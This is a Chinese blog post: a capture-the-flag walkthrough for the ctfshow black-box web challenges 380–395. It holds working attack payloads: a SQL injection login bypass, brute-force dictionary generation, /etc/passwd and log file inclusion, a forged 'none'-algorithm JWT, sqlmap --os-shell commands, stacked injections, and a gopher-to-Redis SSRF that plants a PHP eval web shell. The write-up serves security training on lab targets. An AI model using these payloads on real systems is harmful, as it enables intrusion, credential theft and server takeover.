ctfshow web入门 黑盒测试

于 2024-05-20 20:44:47 发布
阅读量844 收藏 8
点赞数 15
分类专栏: ctfshow 文章标签: 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/139062374
版权

web380

这里文章看的我好有感触
在这里插入图片描述但是影响做题
扫描一下
在这里插入图片描述
访问flag.php啥也没有再访问page.php
在这里插入图片描述

page.php?id=flag

web381

扫出来page.php但是没啥用哇,查看源代码
在这里插入图片描述
这些文件挨个试发现啥也没,最后仔细对比发现其实都是layui,然后尝试着访问alsckdfy

这就是后台地址,给你ctfshow{1b7d317f-8d64-4d72-ab67-cc059e937dd1}

web382

访问后台地址alsckdfy
直接爆破得到
在这里插入图片描述

web383

我是直接填的账号密码,至于账号为什么是admin我猜的
但是还有一种方法是万能密码

注入点在用户名
-1' or 1=1#

web384

密码前2位是小写字母,后三位是数字

这里写一个脚本

import string
s1=string.ascii_lowercase
s2=string.digits
f=open('dict.txt','w')
for i in s1:
	for j in s1:
		for k in s2:
			for l in s2:
				for m in s2:
					p=i+j+k+l+m
					f.write(p+"\n")
f.close()

然后爆破即可
密码是xy123

web385

扫后台
在这里插入图片描述然后重置密码即可

web386

扫后台但是其实dirsearch自带的字典是没有的我们可以添加一下

在这里插入图片描述
访问clear.php然后发现并没有删除,原来是需要传参才可以删除
?file=./install/lock.dat

然后就可以正常操作了

web387

dirsearch -u https://3062a2c1-22a0-4ca2-a9b4-64c80c907965.challenge.ctf.show/ -w /home/kali/Desktop/dirsearch/db/dicc.txt

扫后台
在这里插入图片描述访问debug提示没有file

?file=/etc/passwd

传参发现存在日志包含

?file=/var/log/nginx/access.log

直接UA写马发现不成功
还是把文件删除重置比较好

<?php unlink('/var/www/html/install/lock.dat')?>

然后重置密码

web388

和web387一样

web389

jwt加密的密文一般都是由两个点号分为三段的(三段分别为Header头部、Payload负载、Signature签名),并且前两段都以字符串"eyJ"开头

扫后台发现啥也没有
访问debug发现权限不足

密文:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNjIwMjA2OCwiZXhwIjoxNzE2MjA5MjY4LCJuYmYiOjE3MTYyMDIwNjgsInN1YiI6InVzZXIiLCJqdGkiOiJhNmQyNzUzYjMzMzBjZDllYmVlNWE2ZmJhNmVjMmMxZSJ9.CfY5KLl0Wb40LAsiOuUpm3bt1R4ydVSAbmvSV1YU44Y

import jwt
token = jwt.encode(
{
  "iss": "admin",
  "iat": 1716202068,
  "exp": 1716209268,
  "nbf": 1716202068,
  "sub": "admin",
  "jti": "ae90bdc9a931244e163fea13c5baae44"
},
algorithm="none",key=""
)

print(token.encode("utf-8").decode("utf-8"))

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxNjIwMjA2OCwiZXhwIjoxNzE2MjA5MjY4LCJuYmYiOjE3MTYyMDIwNjgsInN1YiI6ImFkbWluIiwianRpIjoiYWU5MGJkYzlhOTMxMjQ0ZTE2M2ZlYTEzYzViYWFlNDQifQ.

更改cookie,重置密码就行了

web390

这里有个菜鸟往事点进来就可以知道注入点

sqlmap -u "https://3a6778b5-a20f-4f45-8dfe-5894324e19e8.challenge.ctf.show/page.php?id=1" --os-shell

--os-shell这个后缀是使得攻击者能够进行shell命令执行
所以还要加个命令  cat ./alsckdfy/check.php

在这里插入图片描述

web391

进入页面发现有标题搜索了随便搞一个拿到注入点

sqlmap -u "https://1fcf26d4-ec34-4e55-812a-179d3b47ace4.challenge.ctf.show/search.php?title=123" --os-shell

cat ./alsckdfy/check.php

web392

sqlmap -u "https://732e2119-769c-430c-9b45-2b9355d719f7.challenge.ctf.show/search.php?title=1" --os-shell

cat /flag

web393

堆叠注入

search.php?title=1';insert into link values (10,'a','file:///flag');#
然后访问link.php?id=10

web394

search.php?title=1';insert into link values (10,'a',0x66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870);#
16进制绕过
file:///var/www/html/alsckdfy/check.php
然后访问link.php?id=10

web395

可以和上题一样直接秒了
但是有另外一种方法就是

攻击radis服务
在这里插入图片描述

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2430%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

由于网站限制255个字符我们先需要改一下限制

search.php?title=1';alter table link modify column url text;
将link限制的url为255个字符换成text就可以存更长的了

search.php?title=1';insert into link values(6,'a',0x676f706865723a2f2f3132372e302e302e313a363337392f5f2532413125304425304125323438253044253041666c757368616c6c2530442530412532413325304425304125323433253044253041736574253044253041253234312530442530413125304425304125323433302530442530412530412530412533432533467068702532306576616c2532382532345f504f5354253542636d642535442532392533422533462533452530412530412530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343325304425304164697225304425304125323431332530442530412f7661722f7777772f68746d6c2530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343130253044253041646266696c656e616d65253044253041253234392530442530417368656c6c2e706870253044253041253241312530442530412532343425304425304173617665253044253041253041);

然后访问link.php?id=6可能会访问不成功但是此时已经生成了shell.php 
密码是cmd

POST:
cmd=system('cat /var/www/html/alsckdfy/check.php');

在这里插入图片描述

baozongwi
关注
专栏目录
黑盒测试实验报告word文件
06-18
黑盒测试】是一种软件测试方法,主要关注软件的功能,而不涉及其内部结构或工作原理。在黑盒测试中,测试人员充当最终用户的角色,仅根据软件的需求规格说明书来设计和执行测试用例,以验证软件是否能按照预期正确...
CTFshow 黑盒测试
Elite的博客
07-10 1422
黑盒测试是一种软件测试方法,它主要关注于测试系统外部的功能和行为,而不考虑内部的实现细节。
CTFshow——黑盒测试
D.MIND 的博客
08-14 653
文章目录380381382、383384385386387388389390391、392393394、395 380 扫描一个目录,发现page.php,打开发现提示缺少id参数,且id参数控制php文件的打开,直接/page.php?id=flag即可 381 在首页源码中有可疑的路径,一层层打开看就发现flag了 382、383 两题依旧是访问后台:/alsckdfy/,弹出一个登陆界面,在账号处有SQL注入,admin'||1#即可登入 最后还是弱密码爆破一下,账密是admin:admin888
php黑盒测试,CTFSHOW黑盒测试
weixin_42573113的博客
03-28 373
文章目录web380payload后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。page.php?id=flagweb381payload地址在源码里面web382、383还是上面的地址,万能密码登录得到flagweb384字典生成import strings1=string.ascii_lowercases2=string.digitsf=open('dict...
ctfshow黑盒测试
qq_61768489的博客
01-28 721
在search.php这里使用堆叠注入来实现向link表中添加url,我们已知三个字段,并且id控制选择页面。与上题一样,不一样的点在于这题将file字符ban了,可以利用16进制0x绕过。link表里的第三个字段是url,也就认为是搜索引擎那里跳转的url。这里可以利用ssrf可以添加跳转页面即url字段,比如添加。现在的目的应该是删除这个lock.dat然后重置密码。这里传入什么参数也是靠黑盒来猜了,用file参数。$id应该是传的参数,是php的文件名。search.php的注入点,跑不出。
黑盒测试v11
08-03
**黑盒测试** 是一种软件测试方法,它主要关注软件的功能性需求,而不涉及其内部结构或实现方式。在黑盒测试中,测试人员扮演最终用户的角色,仅根据软件提供的接口进行操作,验证软件是否满足预期的行为和结果。 1...
软件测试黑盒测试 方法大全
最新发布
06-01
### 软件测试黑盒测试方法大全 #### 黑盒测试的概念 黑盒测试,也被称作功能测试、数据驱动测试或者基于规格说明书的测试,是从用户角度出发的一种测试方法。在这种测试方法中,测试者将待测系统视为一个“黑盒”...
软件测试中web安全黑盒测试之保证测试的全面性
03-23
Flash软件测试中web安全黑盒测试之保证测试的全面性在目前的WEB安全黑盒测试方法中,一般是按照黑客攻击的手法进行测试,以达到准确性与全面性。那么,如何保证黑盒测试的全面性与准确性呢?总结一下,可以有以下几...
黑盒测试的方法-PPT
09-26
**黑盒测试方法** 在软件测试领域,黑盒测试是一种重要的测试策略,它主要关注软件的功能,不涉及内部结构或实现细节。此方法基于软件的需求规格说明书,通过模拟用户与软件的交互,来验证系统是否能正确执行预期...
【CTFSHOW】web入门 黑盒测试
7ruth0hn的博客
09-29 1520
文章目录写在前面web380web381web382web383web384web385web386web387web388web389web390web391web392web393web394web395参考资料 写在前面 一直没搞过渗透,先学学黑盒测试web380 进入题目发现是一个关于灯泡的悲伤故事,点进去,看到跳转到page_1.php页面。 我们访问page.php试试: 发现报错:$id.php,可以猜想需要传名称为id的参数,来访问id.php。我们访问page.php?id=1试试
ctfshow(web入门
qq_62553635的博客
01-15 2351
第三题 根据提示直接bp抓包 发送到repeater查看响应包 得flag
ctfshow 黑盒测试web380-395 wp
m0_50936156的博客
04-22 400
目录web 380web 381web 381,382web 383-386web 387web 49web 50web 51web 52 记录下学习内容 web 380 开启题目,一个小型网站,四处浏览,没半点头绪,后来想到了目录扫描,结果线程最大为5否则504,看其他师傅的wp 有一个page.php页面 打开$id.php失败 猜到是file_get_contents,id传入page,出现关键部分 $html = file_get_contents('page_'.$id.'.php');
CTFSHOW黑盒测试
羽的博客
01-15 1943
文章目录web380web381web382、383web384web385web386web387388web389web390web391web392web393 web380 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag web381 payload 地址在源码里面 web382、383 还是上面的地址,万能密码登录得到flag web384 字典生成 import string s1=string.asci
CTFshow刷题日记-WEB-黑盒测试web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3143
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
ctfshow-web入门-黑盒测试web380-386)
i_kei的博客
01-11 1239
鸣谢 感谢ctfshow平台对本栏目的大力支持(皮一下很开心) web380 打开页面之后,分析了网页源码,翻了半天css,什么都没找到 后来经过太空人师傅提示page.php,打开看看 提示打开$id.php失败,构造page.php?id=flag,查看源码发现flag web381 看了一晚上源码,愣是没发现这个目录,我醉了 访问/alsckdfy/即可获得flag web382 继续打开后台 第一种解法: 万能密码登录 例: admin 'or ‘1’=‘1’# 登录即可拿到flag 第
ctfshow__黑盒测试
qq_45655564的博客
07-04 412
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
ctfshow_黑盒测试
qq_45951598的博客
12-22 570
文章目录WEB38WEB39web40web41 WEB38 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag WEB39 这里爆出了路径,直接访问获取flag。 web40 这里和上一题一样,但是多了一个弱密码. web41 ...
ctfshow之黑盒测试380-395
qq_50589021的博客
09-15 781
前言 总结黑盒测试思路 可能用到的字典 xy123 admin888 /install/index.php /clear.php /page.php /alsckdfy/index.php /debug web380——测试URL参数 web381——找后台 web382、383——sql万能密码 web384——爆破 开始过滤 爆破 字典生成: import string s1=string.ascii_lowercase # 小写字母a-z s2=string.digits # 数字 f=op
ctfshow 黑盒测试
09-03
黑盒测试是一种软件测试方法,测试人员只关注软件的输入和输出,而不考虑内部实现细节。在黑盒测试中,测试人员不具备软件的源代码或内部结构的了解,而只能通过输入不同的数据来观察系统的行为和输出结果,以验证其功能是否正确。黑盒测试可以帮助发现系统的功能缺陷、界面问题、性能问题等。 CTFShow是一个安全技术竞赛平台,提供各种安全相关的题目供参赛者解答。在CTFShow中,黑盒测试可能是其中的一类题目类型,参赛者需要通过对目标系统的输入输出进行分析和测试,利用系统漏洞或弱点来获取敏感信息或攻击系统。 需要注意的是,黑盒测试在合法授权和合规范围内进行,不得违反法律法规或侵犯他人利益。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值